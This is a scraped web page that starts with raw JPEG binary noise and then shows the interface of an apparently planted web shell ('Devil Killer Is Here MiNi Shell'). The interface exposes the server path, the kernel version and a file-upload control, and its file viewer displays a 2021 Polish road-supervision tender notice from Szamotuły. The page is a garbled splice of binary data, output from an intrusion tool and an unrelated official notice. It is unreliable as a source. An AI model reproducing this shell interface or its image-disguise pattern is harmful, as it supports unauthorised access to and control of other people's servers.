JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210714/0011395701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00113957 z dnia 2021-07-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nadzór inwestorski nad zadaniem: Przebudowa DP nr 1855P Śmiłowo – Gałowo - odc. II Śmiłowo – Jastrowo wraz z budową ronda w m. Jastrowo - odc. III w części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W SZAMOTUŁACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631277227</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesława Chrobrego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szamotuły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">612932152</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@zdp-szamotuly.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdp-szamotuly.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nadzór inwestorski nad zadaniem: Przebudowa DP nr 1855P Śmiłowo – Gałowo - odc. II Śmiłowo – Jastrowo wraz z budową ronda w m. Jastrowo - odc. III w części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e66c296-e488-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00113957</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001435/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Nadzór inwestorski nad zadaniem: Przebudowa DP nr 1855P Śmiłowo – Gałowo - odc. II Śmiłowo – Jastrowo wraz z budową ronda w m. Jastrowo - odc. III w części.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zdp-szamotuly.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: <br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: (kosickas@zdp-szamotuly.pl) <br/>2)	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Mateusz Kaczmarek – Inspektor ds. dróg, tel. +48 612924032, email: kosickas@zdp-szamotuly.pl <br/>3)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. <br/>4)	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>5)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>6)	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>7)	Niniejsze postępowanie można wyszukać również na Liście wszystkich postępowań w systemie miniportal (https://miniportal.uzp.gov.pl/Postepowania) na liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>8)	Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z miniportal i ePuap - stanowiącej zał. nr 6 do SWZ. Instrukcja została zamieszona także bezpośrednio na portalu (https://miniportal.uzp.gov.pl/Instrukcje).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl/instrkcje/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający oświadcza, że spełnia wymogi określone<br/>wrozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w<br/>sprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnegoprzepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochroniedanych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane<br/>przezwykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami<br/>krajowymi.2)Administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych, ul. B.<br/>Chrobrego 6, 64-500 Szamotuły.3) Wyznaczono inspektora ochrony danych, z którym można się<br/>kontaktować poprzeze-mail: kaczmarekm@zdp-szamotuly.pl, lub pisemnie: ul. B. Chrobrego 6, 64-500<br/>Szamotuły.4) Daneosobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym zprzedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Naprawa<br/>ubytkównawierzchni bitumicznej dróg powiatowych na terenie powiatu szamotulskiego masą mineralno<br/>–bitumiczną na gorąco”Z uwagi na ograniczenia techniczne (możliwość wprowadzenia<br/>tylko4000znaków) - nie ma możliwości wprowadzenia całej treści kaluzuli.Kompleksowa<br/>treśćklauzuliinformacyjnej RODO została zawarta w rozdziale I, pkt 16. SWZ. Prosimy o zapoznanie<br/>się zjejtreścią</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:− na podstawie art. 15<br/>RODOprawodostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO<br/>prawodosprostowania Pani/Pana danych osobowych **;− na podstawie art. 18 RODO prawo<br/>żądaniaodadministratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,<br/>októrychmowa w art. 18 ust. 2 RODO ***;− prawo do wniesienia skargi do Prezesa Urzędu<br/>OchronyDanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczącychnaruszaprzepisy RODO;Nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub<br/>e RODOprawo dousunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym<br/>mowa wart. 20RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danychosobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.<br/>1 lit. cRODO. **Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianąwynikupostępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>wzakresieniezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników.***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniudoprzechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celuochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznegoUniiEuropejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.272.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi: <br/> <br/>Nadzór inwestorski nad zadaniem: „Przebudowa drogi powiatowej nr 1855P Śmiłowo – Gałowo - odcinek II od km 0+035,44 do km 2+100,00 Śmiłowo – Jastrowo wraz z budową ronda w miejscowości Jastrowo - odcinek III w części od km 2+100 do km 2+278,69”<br/>Szczegółowe informacje dotyczące postępowania o udzielenie zamówienia na wykonanie ww. robót budowlanych są dostępne na stronie internetowej Zamawiającego (nr postępowania: ZDP.272.6.2021) Prosimy o zapoznanie się przed złożeniem oferty.<br/>Przedmiot zamówienia obejmuje wszystkie prace i obowiązki inspektora nadzoru nad ww. zadaniem w branży:<br/>- drogowej, <br/>- sanitarnej – kanalizacja deszczowa,<br/>- elektrycznej,<br/>- telekomunikacyjnej.<br/>Roboty budowlane są podzielona na dwa etapy prac, zgodnie z harmonogramem rzeczowo-finansowym realizacji zamówienia, tj.:<br/>I etap: 50% wartości zamówienia w tym rondo w m. Jastrowo wykonane w całości do dnia: 02.11.2021r. <br/>II etap: pozostała część zamówienia do dnia 01.08.2022r.<br/>Zakres inwestycji przedstawiony jest w dokumentacji architektoniczno – budowlanej załączonej do SWZ. <br/><br/> <br/>2) Wspólny Słownik Zamówień CPV: <br/><br/>71247000-1 - Nadzór nad robotami budowlanymi </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-02</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba przyjazdów na teren budowy w każdym tygodniu realizacji robót budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Formularz ofertowy 2. Wykaz rozwiązań równoważnych - jeżeli dotyczy3. Zastrzeżenie<br/>tajemnicy przedsiębiorstwa - jeżeli dotyczy4. Pełnomocnictwo - jeżeli dotyczy- w formie<br/>elektronicznej (podpis kwalifikowany) lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym. - dopuszcza się również przedłożenie elektronicznej kopii<br/>dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej<br/>kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. Zgodnie z<br/>art. 97 § 2 ustawy z 14 lutego 1991 r. – Prawo onotariacie, elektroniczne poświadczenie<br/>zgodności odpisu, wyciągu lub kopii z okazanym dokumentem notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dowodami potwierdzającymi, że przygotowanie oferty, oferty częściowej nastąpiło niezależnie od Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ. <br/><br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/> szczególności odpowiedzialnych za poszczególne branże, wraz z informacjami na<br/> temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do<br/> wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/> informację o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Zamawiający wymaga wniesienia wadium w wysokości 2 000,00 zł. <br/>2)	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>3)	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. <br/>4)	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>a)	pieniądzu; <br/>b)	gwarancjach bankowych; <br/>c)	gwarancjach ubezpieczeniowych; <br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2020 r. poz. 299) <br/>5)	Wadium wnoszone w pieniądzu PLN należy wpłacić przelewem na następujący rachunek bankowy: Bank Spółdzielczy Duszniki O/Szamotuły, konto nr 55 9072 0002 2004 0440 0208 0016 z dopiskiem: „Nadzór inwestorski 1855P, nr sprawy: ZDP.272.8.2021”. Potwierdzenie polecenia przelewu zaleca się dołączyć do oferty (nie stanowi to obowiązku). Wadium uważa się za wniesione, jeżeli kwota wadium znajdzie się na rachunku wskazanym przez zamawiającego przed upływem terminu składania ofert. <br/>6)	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. <br/>7)Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 4), wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>8)	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>a)	upływu terminu związania ofertą, <br/>b)	zawarcia umowy w sprawie zamówienia publicznego, <br/>c)	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>Szczegółowe informację w SWZ (Brak możliwości wstawienia większej ilości znaków) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców ubiegających się wspólnie o udzielenie<br/>zamówieniawykonawcyzobowiązani są do ustanowienia pełnomocnika. Dokument<br/>pełnomocnictwa, z treściktóregobędzie wynikało umocowanie do reprezentowania w<br/>postępowaniu o udzieleniezamówienia tychwykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno byćzałączone do oferty ipowinno zawierać w szczególności<br/>wskazanie:- postępowania ozamówienie publiczne, któregodotyczy,- wszystkich wykonawców<br/>ubiegających się wspólnie oudzielenie zamówieniawymienionych z nazwy z określeniem adresu<br/>siedziby,- ustanowionegopełnomocnika orazzakresu jego umocowania.Wymagana<br/>forma:Pełnomocnictwo powinnozostać złożone w formieelektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisemzaufanym, lub podpisemosobistym.Dopuszcza się również<br/>przedłożenie elektronicznej kopiidokumentu poświadczonejza zgodność z oryginałem przez<br/>notariusza, tj. podpisanejkwalifikowanym podpisemelektronicznym osoby posiadającej<br/>uprawnienia notariusza. Zgodnie zart. 97 § 2 ustawy z 14lutego 1991 r. – Prawo o notariacie,<br/>elektroniczne poświadczeniezgodności odpisu, wyciągu lubkopii z okazanym dokumentem<br/>notariusz opatruje kwalifikowanympodpisem elektronicznym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)	Projektowane postanowienia umowy stanowią załącznik nr 2 do SWZ. <br/>2)	Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy. <br/>3)	Z wnioskiem o dokonanie zmiany umowy w przypadku, o którym mowa w ust. 1, może wystąpić każda ze stron. <br/>4)	We wniosku o dokonanie zmian, Strona winna uzasadnić konieczność takich zmian. W przypadku niewystarczającego uzasadnienia, Zamawiający ma prawo nie wyrazić zgody na dokonanie zmian Umowy. <br/>5)	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności, chyba że SWZ lub zapisy projektowanych postanowień umowy stanowią inaczej. <br/>6)	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy, zgodnie z zapisami projektu umowy – zał. nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-22 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-21</span></h3></main><footer 